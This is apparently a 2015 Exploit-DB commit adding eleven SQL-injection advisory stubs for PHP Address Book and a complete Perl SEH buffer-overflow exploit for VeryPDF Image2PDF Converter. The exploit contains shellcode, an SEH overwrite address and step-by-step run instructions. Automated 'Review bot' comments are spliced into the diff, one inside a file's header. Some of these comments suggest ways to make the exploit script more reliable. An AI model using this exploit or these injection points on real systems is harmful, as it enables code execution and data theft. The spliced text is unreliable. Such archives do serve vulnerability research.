From 822237ba4d0c34aa83ffe6c8e763ed497810e72d Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 10 Oct 2015 05:03:14 +0000
Subject: [PATCH] DB: 2015-10-10 12 new exploits
---
 files.csv | 12 +++++++
 platforms/php/webapps/38425.txt | 9 +++++
 platforms/php/webapps/38426.txt | 9 +++++
 platforms/php/webapps/38427.txt | 9 +++++
 platforms/php/webapps/38428.txt | 9 +++++
 platforms/php/webapps/38429.txt | 9 +++++
 platforms/php/webapps/38430.txt | 9 +++++
 platforms/php/webapps/38431.txt | 9 +++++
 platforms/php/webapps/38432.txt | 9 +++++
 platforms/php/webapps/38433.txt | 9 +++++
 platforms/php/webapps/38434.txt | 9 +++++
 platforms/php/webapps/38435.txt | 9 +++++
 platforms/windows/local/38423.py | 60 ++++++++++++++++++++++++++++++++
 13 files changed, 171 insertions(+)
 create mode 100755 platforms/php/webapps/38425.txt
 create mode 100755 platforms/php/webapps/38426.txt
 create mode 100755 platforms/php/webapps/38427.txt
 create mode 100755 platforms/php/webapps/38428.txt
 create mode 100755 platforms/php/webapps/38429.txt
 create mode 100755 platforms/php/webapps/38430.txt
 create mode 100755 platforms/php/webapps/38431.txt
 create mode 100755 platforms/php/webapps/38432.txt
 create mode 100755 platforms/php/webapps/38433.txt
 create mode 100755 platforms/php/webapps/38434.txt
 create mode 100755 platforms/php/webapps/38435.txt
 create mode 100755 platforms/windows/local/38423.py
diff --git a/files.csv b/files.csv
index ae7b50a44..ca40c5d2a 100755
--- a/files.csv
+++ b/files.csv
@@ -34705,3 +34705,15 @@ id,file,description,date,author,platform,type,port
 38420,platforms/multiple/dos/38420.txt,"Google Chrome Cookie Verification Denial of Service Vulnerability",2013-04-04,anonymous,multiple,dos,0
 38421,platforms/linux/dos/38421.txt,"Apache Subversion 1.6.x 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability",2013-04-05,anonymous,linux,dos,0
 38422,platforms/linux/dos/38422.txt,"Apache Subversion Remote Denial of Service Vulnerability",2013-04-05,"Greg McMullin",linux,dos,0
+38423,platforms/windows/local/38423.py,"VeryPDF Image2PDF Converter SEH Buffer Overflow",2015-10-08,"Robbie Corley",windows,local,0
+38425,platforms/php/webapps/38425.txt,"PHP Address Book /addressbook/register/delete_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38426,platforms/php/webapps/38426.txt,"PHP Address Book /addressbook/register/edit_user.php id Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38427,platforms/php/webapps/38427.txt,"PHP Address Book /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38428,platforms/php/webapps/38428.txt,"PHP Address Book /addressbook/register/linktick.php site Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38429,platforms/php/webapps/38429.txt,"PHP Address Book /addressbook/register/reset_password.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38430,platforms/php/webapps/38430.txt,"PHP Address Book /addressbook/register/reset_password_save.php Multiple Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38431,platforms/php/webapps/38431.txt,"PHP Address Book /addressbook/register/router.php BasicLogin Cookie Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38432,platforms/php/webapps/38432.txt,"PHP Address Book /addressbook/register/traffic.php var Parameter SQL Injection",2013-04-05,"Jurgen 
Voorneveld",php,webapps,0
+38433,platforms/php/webapps/38433.txt,"PHP Address Book /addressbook/register/user_add_save.php email Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38434,platforms/php/webapps/38434.txt,"PHP Address Book /addressbook/register/checklogin.php username Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
+38435,platforms/php/webapps/38435.txt,"PHP Address Book /addressbook/register/admin_index.php q Parameter SQL Injection",2013-04-05,"Jurgen Voorneveld",php,webapps,0
diff --git a/platforms/php/webapps/38425.txt b/platforms/php/webapps/38425.txt
new file mode 100755
index 000000000..0c84d2beb
--- /dev/null
+++ b/platforms/php/webapps/38425.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/delete_user.php?id={insert}
\ No newline at end of file
diff --git a/platforms/php/webapps/38426.txt b/platforms/php/webapps/38426.txt
new file mode 100755
index 000000000..7ddbc7dbf
--- /dev/null
+++ b/platforms/php/webapps/38426.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/edit_user.php?id={insert}
\ No newline at end of file
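Review bot: The new row for 38423 records the path `platforms/windows/local/38423.py`, but the file this commit adds at that path is Perl (`$shellcode = ...`, `pack('V', ...)`, `open(myfile, ...)`), so the extension in the index misdescribes the language and any tooling that picks an interpreter or syntax highlighter from it will get the wrong one. A `.pl` path for both the index row and the file (constructed example: `platforms/windows/local/38423.pl`) would match the content. The remaining rows are consistent with the advisory files added in the same commit.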
diff --git a/platforms/php/webapps/38427.txt b/platforms/php/webapps/38427.txt
new file mode 100755
index 000000000..27e237c77
--- /dev/null
+++ b/platforms/php/webapps/38427.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/edit_user_save.php?id={insert}&lastname={insert}&firstname={insert}&phone={insert}&email={insert}&permissions={insert}¬es={insert}
\ No newline at end of file
diff --git a/platforms/php/webapps/38428.txt b/platforms/php/webapps/38428.txt
new file mode 100755
index 000000000..7d80431bd
--- /dev/null
+++ b/platforms/php/webapps/38428.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/linktick.php?site={insert}
\ No newline at end of file
diff --git a/platforms/php/webapps/38429.txt b/platforms/php/webapps/38429.txt
new file mode 100755
index 000000000..04e69c73f
--- /dev/null
+++ b/platforms/php/webapps/38429.txt
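Review bot: The last parameter of the PoC URL on the final added line of 38427.txt reads `¬es={insert}`, which looks like `&notes={insert}` after the `&not` prefix was decoded as the HTML entity for `¬` somewhere between the advisory and this file; as committed, the parameter name no longer corresponds to a field of edit_user_save.php, so the "Multiple Parameter" entry in files.csv describes one parameter more than the file actually names. This is inferred from the surrounding `&name={insert}` pattern rather than from the original advisory, so it is worth checking against the linked source before changing the file. The other advisory files in this commit do not show the same artefact.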
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/reset_password.php?email={insert}&password={insert}
\ No newline at end of file
diff --git a/platforms/php/webapps/38430.txt b/platforms/php/webapps/38430.txt
new file mode 100755
index 000000000..04647b4f2
--- /dev/null
+++ b/platforms/php/webapps/38430.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/reset_password_save.php?username={insert}&password=&password_confirm=&password_hint={insert}&email={insert}
\ No newline at end of file
diff --git a/platforms/php/webapps/38431.txt b/platforms/php/webapps/38431.txt
new file mode 100755
index 000000000..743a7e8b5
--- /dev/null
+++ b/platforms/php/webapps/38431.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/router.php COOKIE var BasicLogin
\ No newline at end of file
diff --git a/platforms/php/webapps/38432.txt b/platforms/php/webapps/38432.txt
new file mode 100755
index 000000000..3db6313df
--- /dev/null
+++ b/platforms/php/webapps/38432.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/traffic.php?var={insert}
\ No newline at end of file
diff --git a/platforms/php/webapps/38433.txt b/platforms/php/webapps/38433.txt
new file mode 100755
index 000000000..4f0f4b437
--- /dev/null
+++ b/platforms/php/webapps/38433.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/user_add_save.php POST var email
\ No newline at end of file
diff --git a/platforms/php/webapps/38434.txt b/platforms/php/webapps/38434.txt
new file mode 100755
index 000000000..64de207d0
--- /dev/null
+++ b/platforms/php/webapps/38434.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/checklogin.php?username={insert}&password=pass
\ No newline at end of file
diff --git a/platforms/php/webapps/38435.txt b/platforms/php/webapps/38435.txt
new file mode 100755
index 000000000..521734c72
--- /dev/null
+++ b/platforms/php/webapps/38435.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/58911/info
+
+PHP Address Book is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+PHP Address Book 8.2.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/addressbook/register/admin_index.php?q={insert}
\ No newline at end of file
diff --git a/platforms/windows/local/38423.py b/platforms/windows/local/38423.py
new file mode 100755
index 000000000..bdb483009
--- /dev/null
+++ b/platforms/windows/local/38423.py
@@ -0,0 +1,60 @@
+#********************************************************************************************************************************************
+#
+# Exploit Title: VeryPDF Image2PDF Converter SEH Buffer Overflow
+# Date: 10-7-2015
+# Software Link: http://www.verypdf.com/tif2pdf/img2pdf.exe
+# Exploit Author: Robbie Corley
+# Platform Tested: Windows 7 x64
+# Contact: c0d3rc0rl3y@gmail.com
+# Website:
+# CVE:
+# Category: Local Exploit
+#
+# Description:
+# The title parameter contained within the c:\windows\Image2PDF.INI is vulnerable to a buffer overflow.
+# This can be exploited using SEH overwrite.
+#
+# Instructions:
+# 1. Run this sploit as-is. This will generate the new .ini file and place it in c:\windows, overwriting the existing file
+# 2. Run the Image2PDF program, hit [try], file --> add files
+# 3. Open any .tif file. Here's the location of one that comes with the installation: C:\Program Files (x86)\VeryPDF Image2PDF v3.2\trial.tif
+# 4. Hit 'Make PDF', type in anything for the name of the pdf-to-be, and be greeted with your executed shellcode ;)
+#**********************************************************************************************************************************************
+
+#standard messagebox shellcode.
+$shellcode =
+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
+"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
+"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
+"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
+"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
+"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
+"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
+"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
+
+$padding="\x90" x 2985;
+$seh=pack('V',0x6E4B3045); #STANDARD POP POP RET
+$morepadding="\x90" x 1096;
+
+open(myfile,'>c:\\windows\\Image2PDF.INI'); #generate the dummy DWF file
+
+#.ini file header & shellcode
+print myfile "[SaveMode]
+m_iMakePDFMode=0
+m_iSaveMode=0
+m_szFilenameORPath=
+m_iDestinationMode=0
+m_bAscFilename=0
+m_strFileNumber=0001
+[BaseSettingDlg]
+m_bCheckDespeckle=0
+m_bCheckSkewCorrect=0
+m_bCheckView=0
+m_szDPI=default
+m_bCheckBWImage=1
+[SetPDFInfo]
+m_szAuthor=
+m_szSubject=
+m_szTitle=".$padding."\xEB\x06\x90\x90".$seh.$shellcode.$morepadding;
+
+close (myfile); #close the file
\ No newline at end of file
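Review bot: `open(myfile,'>c:\\windows\\Image2PDF.INI');` uses a bareword handle with the two-argument form of open and never checks the result, so if the file cannot be created (the target is the Windows directory, which typically needs elevated rights to write) the following `print myfile` and `close (myfile)` run against an unopened handle and the script still exits as if it had succeeded. Prefer `open my $fh, '>', 'c:\\windows\\Image2PDF.INI' or die "open: $!";`, `print {$fh} "[SaveMode]...";` and `close $fh or die "close: $!";`, and add `use strict; use warnings;` below the header comment. The trailing comment `#generate the dummy DWF file` names the wrong format; `#write the Image2PDF.INI that the converter reads` would match the description in the header. The file is Perl rather than Python, so the `.py` suffix recorded for it in files.csv is misleading.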